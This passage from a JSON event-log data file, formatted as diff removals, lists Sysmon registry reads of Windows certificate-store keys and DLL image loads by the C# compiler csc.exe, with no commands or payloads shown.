- "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 